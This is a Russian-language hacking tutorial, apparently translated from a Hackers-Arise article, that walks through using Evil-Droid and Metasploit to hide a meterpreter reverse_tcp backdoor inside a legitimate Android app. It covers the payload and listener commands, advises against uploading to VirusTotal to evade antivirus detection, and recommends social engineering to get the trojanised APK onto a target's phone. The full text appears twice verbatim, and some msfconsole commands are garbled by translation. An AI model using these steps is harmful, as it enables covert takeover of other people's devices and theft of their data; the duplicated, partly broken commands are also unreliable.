Добро пожаловать обратно, мои начинающие хакеры!
Мобильные устройства – смартфоны и планшеты – распространяются по всему миру, постепенно вытесняя настольные компьютеры и ноутбуки. Эти устройства, как правило, работают под управлением iOS или Android, причём Android составляет большую часть всех операционных систем мобильных устройств (82%). Учитывая рост рынка мобильных устройств и доминирование операционной системы Android, вполне логично, что взлом Android всё чаще становится передовой хакерской деятельностью. Поэтому мы, Hackers-Arise, будем уделять всё больше времени взлому Android и создавать обучающие материалы, чтобы подготовить вас к этому.
Это третья статья из серии «Взлом Android», которой предшествовали «Создание лаборатории по взлому Android» и «Основы Android» . Настоятельно рекомендую вам ознакомиться с моей статьей «Основы Android» , прежде чем читать дальше.
Шаг №1 Загрузите и установите Evil Droid
Для внедрения бэкдора в APK-файл Android мы будем использовать Evil-Droid . Это скрипт на Python, разработанный Маскерано Бачиром, который генерирует фреймворк для создания и внедрения полезной нагрузки APK для проникновения на платформы Android.
Чтобы загрузить скрипт, вы можете скопировать его в свою систему, введя:
kali > git clone https://github.com/M4sc3r4n0/Evil-Droid
Если вы получили сообщение об ошибке, указывающее на то, что некоторые зависимости Evil-Droid недоступны или устарели, вам может потребоваться обновить ваши пакеты до более новых версий.
kali > apt-get upgrade
Шаг №2: Предоставьте себе разрешение на выполнение
Следующий шаг, конечно же, — предоставить себе разрешение на выполнение этого скрипта. Для этого перейдите в каталог Evil-Droid и используйте команду chmod, чтобы предоставить себе разрешение на выполнение.
kali > cd Evil-Droid
kali > chmod 775 evil-droid
Шаг №3. Казнить злого дроида.
Далее запустим evil-droid. Evil-droid проверит наличие интернет-соединения и нескольких необходимых программ, включая Metasploit.
кали > ./evil-droid
Обратите внимание на предупреждение внизу, выделенное КРАСНЫМ цветом. НЕ загружайте APK-файл на VirusTotal.com, так как это приведёт к активации антивирусной сигнатуры разработчиками антивируса.
Шаг №4. Реализация фреймворка
Как только evil-droid успешно обнаружит все необходимые компоненты, вы получите сообщение, подобное приведенному ниже, с вопросом, хотите ли вы «Выполнить фреймворк и службы». Нажмите «Да».
Шаг №5 Выберите бэкдор
Вас встретит экран меню ниже. Вы можете выбрать любой бэкдор по номеру. В данном случае мы выбрали «Backdoor APK Original (NEW)».
Шаг №6 Выберите IP и порт
Затем Evil-droid попросит вас настроить LHOST (для Metasploit) и отобразит ваш локальный IP-адрес и публичный IP-адрес.
Затем вам будет предложено указать LPORT. Порт 4444 — это порт по умолчанию для Meterpreter от Metasploit и других полезных нагрузок.
Шаг №7. Дайте имя своей полезной нагрузке
Затем Evil-droid попросит вас дать имя вашей полезной нагрузке. Я назвал её hackers-arise-app, но вы можете назвать её как угодно.
Шаг №8: Выберите полезную нагрузку/прослушиватель
Теперь нам нужно выбрать полезную нагрузку. Evil-droid позволяет использовать любую полезную нагрузку Android из Metasploit, включая android/meterpreter/reverse_tcp . Просто нажмите на переключатель рядом с полезной нагрузкой, которую вы хотите встроить в APK.
Шаг №9 Загрузите APK и встройте бэкдор
Затем evil-droid предлагает нам указать APK-файл, в который мы хотим встроить бэкдор. Я скачал любимый Foxnews.apk для встраивания нашего бэкдора.
Шаг №10 Выберите Metasploit Multi-Handler для создания соединения
На следующем шаге нам нужно указать evil-droid, как мы будем подключаться к бэкдору. Выберите «Multi-Handler».
Теперь нам нужно открыть многофункциональный обработчик в Metasploit, чтобы он мог «перехватить» соединение, возвращаемое от встроенной полезной нагрузки.
Откройте Metasploit, введя:
kali > msfconsole
Теперь нам нужно запустить многопользовательский обработчик и указать Metasploit, какой IP-адрес и порт прослушивать, а также какую полезную нагрузку прослушивать.
msf > использовать эксплойт/мульти/обработчик
msf > set PAYLOAD android/meterpreter/reverse_tcp
msf > SET LHOST 192.168.1.104
msf > установить LPORT 4444
Шаг №11: Доставка APK получателю
На этом последнем этапе нам понадобится APK-файл (со встроенным бэкдором), который можно установить и запустить на целевом Android-устройстве. Здесь могут пригодиться навыки социальной инженерии. Вы можете отправить APK-файл по электронной почте, через DropBox или другой файлообменник. Если у вас есть физический доступ к устройству, вы можете просто установить его самостоятельно.
Когда целевой пользователь устанавливает приложение для просмотра «честных и сбалансированных» новостей FoxNews, оно запускает бэкдор и подключается обратно к вашей системе, предоставляя вам оболочку meterpreter на своем устройстве Android!
Из оболочки Meterpreter можно делать практически всё на устройстве Android. Список команд Meterpreter можно найти здесь.
Продолжайте в том же духе, мои начинающие хакеры, и мы вместе рассмотрим еще больше способов взлома Android-устройств!
Мобильные устройства – смартфоны и планшеты – распространяются по всему миру, постепенно вытесняя настольные компьютеры и ноутбуки. Эти устройства, как правило, работают под управлением iOS или Android, причём Android составляет большую часть всех операционных систем мобильных устройств (82%). Учитывая рост рынка мобильных устройств и доминирование операционной системы Android, вполне логично, что взлом Android всё чаще становится передовой хакерской деятельностью. Поэтому мы, Hackers-Arise, будем уделять всё больше времени взлому Android и создавать обучающие материалы, чтобы подготовить вас к этому.
Это третья статья из серии «Взлом Android», которой предшествовали «Создание лаборатории по взлому Android» и «Основы Android» . Настоятельно рекомендую вам ознакомиться с моей статьей «Основы Android» , прежде чем читать дальше.
Шаг №1 Загрузите и установите Evil Droid
Для внедрения бэкдора в APK-файл Android мы будем использовать Evil-Droid . Это скрипт на Python, разработанный Маскерано Бачиром, который генерирует фреймворк для создания и внедрения полезной нагрузки APK для проникновения на платформы Android.
Чтобы загрузить скрипт, вы можете скопировать его в свою систему, введя:
kali > git clone https://github.com/M4sc3r4n0/Evil-Droid
Если вы получили сообщение об ошибке, указывающее на то, что некоторые зависимости Evil-Droid недоступны или устарели, вам может потребоваться обновить ваши пакеты до более новых версий.
kali > apt-get upgrade
Шаг №2: Предоставьте себе разрешение на выполнение
Следующий шаг, конечно же, — предоставить себе разрешение на выполнение этого скрипта. Для этого перейдите в каталог Evil-Droid и используйте команду chmod, чтобы предоставить себе разрешение на выполнение.
kali > cd Evil-Droid
kali > chmod 775 evil-droid
Шаг №3. Казнить злого дроида.
Далее запустим evil-droid. Evil-droid проверит наличие интернет-соединения и нескольких необходимых программ, включая Metasploit.
кали > ./evil-droid
Обратите внимание на предупреждение внизу, выделенное КРАСНЫМ цветом. НЕ загружайте APK-файл на VirusTotal.com, так как это приведёт к активации антивирусной сигнатуры разработчиками антивируса.
Шаг №4. Реализация фреймворка
Как только evil-droid успешно обнаружит все необходимые компоненты, вы получите сообщение, подобное приведенному ниже, с вопросом, хотите ли вы «Выполнить фреймворк и службы». Нажмите «Да».
Шаг №5 Выберите бэкдор
Вас встретит экран меню ниже. Вы можете выбрать любой бэкдор по номеру. В данном случае мы выбрали «Backdoor APK Original (NEW)».
Шаг №6 Выберите IP и порт
Затем Evil-droid попросит вас настроить LHOST (для Metasploit) и отобразит ваш локальный IP-адрес и публичный IP-адрес.
Затем вам будет предложено указать LPORT. Порт 4444 — это порт по умолчанию для Meterpreter от Metasploit и других полезных нагрузок.
Шаг №7. Дайте имя своей полезной нагрузке
Затем Evil-droid попросит вас дать имя вашей полезной нагрузке. Я назвал её hackers-arise-app, но вы можете назвать её как угодно.
Шаг №8: Выберите полезную нагрузку/прослушиватель
Теперь нам нужно выбрать полезную нагрузку. Evil-droid позволяет использовать любую полезную нагрузку Android из Metasploit, включая android/meterpreter/reverse_tcp . Просто нажмите на переключатель рядом с полезной нагрузкой, которую вы хотите встроить в APK.
Шаг №9 Загрузите APK и встройте бэкдор
Затем evil-droid предлагает нам указать APK-файл, в который мы хотим встроить бэкдор. Я скачал любимый Foxnews.apk для встраивания нашего бэкдора.
Шаг №10 Выберите Metasploit Multi-Handler для создания соединения
На следующем шаге нам нужно указать evil-droid, как мы будем подключаться к бэкдору. Выберите «Multi-Handler».
Теперь нам нужно открыть многофункциональный обработчик в Metasploit, чтобы он мог «перехватить» соединение, возвращаемое от встроенной полезной нагрузки.
Откройте Metasploit, введя:
kali > msfconsole
Теперь нам нужно запустить многопользовательский обработчик и указать Metasploit, какой IP-адрес и порт прослушивать, а также какую полезную нагрузку прослушивать.
msf > использовать эксплойт/мульти/обработчик
msf > set PAYLOAD android/meterpreter/reverse_tcp
msf > SET LHOST 192.168.1.104
msf > установить LPORT 4444
Шаг №11: Доставка APK получателю
На этом последнем этапе нам понадобится APK-файл (со встроенным бэкдором), который можно установить и запустить на целевом Android-устройстве. Здесь могут пригодиться навыки социальной инженерии. Вы можете отправить APK-файл по электронной почте, через DropBox или другой файлообменник. Если у вас есть физический доступ к устройству, вы можете просто установить его самостоятельно.
Когда целевой пользователь устанавливает приложение для просмотра «честных и сбалансированных» новостей FoxNews, оно запускает бэкдор и подключается обратно к вашей системе, предоставляя вам оболочку meterpreter на своем устройстве Android!
Из оболочки Meterpreter можно делать практически всё на устройстве Android. Список команд Meterpreter можно найти здесь.
Продолжайте в том же духе, мои начинающие хакеры, и мы вместе рассмотрим еще больше способов взлома Android-устройств!